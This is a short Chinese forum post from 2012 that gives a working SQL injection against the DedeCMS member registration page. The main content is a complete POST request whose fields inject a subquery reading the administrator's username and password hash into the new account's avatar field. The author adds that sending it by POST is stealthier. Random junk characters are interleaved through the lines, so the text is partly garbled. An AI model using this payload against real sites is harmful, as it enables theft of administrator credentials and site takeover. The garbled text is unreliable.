dedecms版本 201211222 w/ A; a- d. p) @
" j- n8 Z- ^* f& j6 B. Z
需要magic_quotes_gpc=Off
" U& G$ x. L: y9 L% y' h4 A' p7 J1 e) ]! X+ ~ R. t" u
应该是没有什么大危害的漏洞.
5 A B9 G. i0 t原来发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.1 ?- v9 y$ W T/ H. I$ ~! z. I
8 m, x2 g* |: E3 p/ V7 V, `7 }是一个漏洞.其实不仅仅是审核机制绕过,也可以获得管理员密码的.1 I! H: b6 @) ]+ P
POST提交以下数据,其实不用POST提交的,这样隐蔽点.5 a2 g, \8 U* |- S! |1 ^6 O# U8 O0 ^
3 d' B! I' |9 K2 l& \4 E) o5 m
http:///de/member/reg_new.php
% l. ]: f+ n# O- b1 m V: w, G
, k: M' m5 ?' V8 [ f4 QPOST, ]9 m1 G% {, \* y) S! c0 d9 b K
1 q+ W1 L3 x/ g! W: N( ~dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&userid=c4rp3nt3r&uname=c4rp3nt3r&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,(select concat(userid,0x3a,pwd) from `#@__admin` limit 1),0,'',1316751900,'',1316751900,'');%00&vdcode=glos&agree=0 O: T* o& B2 @; z6 @6 z n+ |( K
( `/ F/ \8 B6 @4 F9 q$ n3 S
成功注册后,头像处里面有好玩的信息.' ^- G% K2 Z/ S5 `* V$ B
, T- u- s- m- h
|
发表于 2012-12-5 10:03:32
收藏
支持
反对